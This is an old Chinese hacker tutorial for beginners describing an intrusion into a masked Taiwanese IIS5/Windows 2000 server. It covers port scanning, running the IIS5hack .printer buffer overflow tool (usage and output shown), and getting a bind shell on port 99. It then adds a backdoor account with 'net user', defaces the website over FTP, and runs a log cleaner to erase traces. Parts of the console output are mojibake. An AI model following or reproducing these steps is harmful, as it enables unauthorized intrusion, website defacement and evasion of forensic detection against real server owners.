一.前言
哈哈~大家好,我Bytes由?斤大家?教程了,哦~?不起,呵呵,去胚?弈了一下??把?入法?咿?,少等^!^……(Ctrl+Shift)
呵呵~现在一切正常.首先申明,本文不是什么"宝典武学".
我给大家说说现在最时髦的入侵IIS5的手法(什么这也有流行时尚??!).现在的IIS5NULL.printer边界监测问题的缓冲区溢出的漏洞实在是比比皆是,国内如此国外也一样..SUNx的IIs5hack,这一工具能很好的帮助你完成攻击任务!(明白了吧~~本文是写给初学者看的!不要以为学会这些就可以妄称黑客!)过几天我给狂刀兄让他传上来,给大家用用(怎么样??Bytes很不错吧,大\好人呀)
二.过程
言归正传,开始我们今天的攻击任务.
目标:www.xxx.com.tw(马赛克处理,我可不想被人骂~~~哈哈哈)
web server:Microsoft IIS/5.0
OS: win2k
嗯~先扫一下他开放端口先(这是通常情况下的攻击第一部):
Open 21(ftp)!!!
Open 23(telnet)!!!(靠!win2k开着telnet,呵呵~不错)
Open 25(stmp)!!!
Open 79(finger)!!!(我喜欢!哈哈)
Open 80 (http)!!!
Open 110(pop)!!!
Open 3389 (unknow)!!!(呵呵~想必这个没用,呵呵~)
ALL DONE!!!(完毕)
嗯~ftp应该是5.0版本的,win2k嘛~应该没什么厉害的漏洞.
不管怎样telnet上去看看先:
开始-运行-(本地菜单)输入:telnet www.xxx.com.tw
嗯~怎么还不出来?光标还在动.."连接丢失!"(My Dod!!!!这是一个伪端口,或者石有防火墙!)看来telnet行不通.
finger看看,特telnet www.xxx.com.tw 79:
"无法连接!"
我昏~什么破扫描啊~哦~忘记了不能骂作者的,因为好像这个是我自己写的,没打算发表,烂了点!呵呵~
那么只好暴力一点从80(http)突破了~呵呵~(怎么像有在偷看MM洗澡的感觉?!)
扫一下看看Unicode怎么样:
No Found!!
All Done!
哈哈~我好霉气~5555555555(TMD,God跟我开玩笑吧?)
嗯~咦~对了不是有NULL.printer的溢出程序吗??哈哈~你还不死,这个漏洞很新的,想必你没补..(偷看人家洗澡怎么还走进去?!)
哈哈!我运气好!先把IIS5hack.exe解压缩,改名成"IIS.exe"(名字短一点,我很懒的..hehe),放到Winnt目录下(这个程序可以在win9x/winNT/win2k运行),这样可以把它当作一个windows组件用.(win9x用户,你可以放到windows目录).
start..
开始-运行-(本地菜单)输入:iis(看一下用法先)
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
usage: C:\WINDOWS\IIS.EXE
chinese edition: 0
chinese edition, sp1: 1 #(对付中文版,sp1就不用我说什么意思了吧??呵呵~Unix类的系统用多了~"#"注译改不过来!)
english edition: 2
english edition, sp1: 3 #(对付E文版)
japanese edition: 4
japanese edition, sp1: 5#(对付日文版)
好~Let me do it!......
开始-运行-(本地菜单)输入:iis www.xxx.com.tw 80 1 (tw的服务器,当然是中文的,该程序简体繁体不区分)
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
Now you can telnet to 99 port
good luck :)
好~我们telnet 99来看一看!
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32
哈哈哈哈哈~好极了,绑定了一个cmdshell,接着来:
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32net user
\\ ?ㄏノ?扁め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
?ハ磅?Ч拨×?碉ネだ┪??岿箕∶
呵呵,这么几个用户,不过现在我应该是system用户权限才是,呵呵~添加一
个用户先
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32net user
\\ ?ㄏノ?扁め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
?ハ磅?Ч拨×?碉ネだ┪??岿箕
C:\WINNT\system32net user bin bin1234/add (注意这是在攻击目标上运行)
net user bin bin1234/add
C:\WINNT\system32
先别退出,在开一个ftp,你就可以用bin/bin1234这个刚刚注册的用户登陆上去,修改了..别忘记load一个cleanLOG的东西,擦擦你的PP ^!^ (出事别怪我没和你说)
ftp修改了对方网页后,然后在切换回telnet
Microsoft Windows 2000 [?セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32net user
\\ ?ㄏノ?扁め
-------------------------------------------------------------------------------
Administrator Guest
IUSR_BIG IWAM_BIG TsInternetUser
?ハ磅?Ч拨×?碉ネだ┪??岿箕
C:\WINNT\system32net user bin bin1234/add (注意这是在攻击目标上运行)
net user bin bin1234/add
C:\WINNT\system32c:\inetpub\wwwroot\cleanLOG.exe(一般你上传就在这个目录下,注意cleanLOG是我假设的.运行他,擦擦咱的PP)
C:\WINNT\system32exit(做完了,走人??
过几天大家来本站找iis5hack用吧,呵呵~~最后谢谢大家看我的文章..
~~~~~~~BB
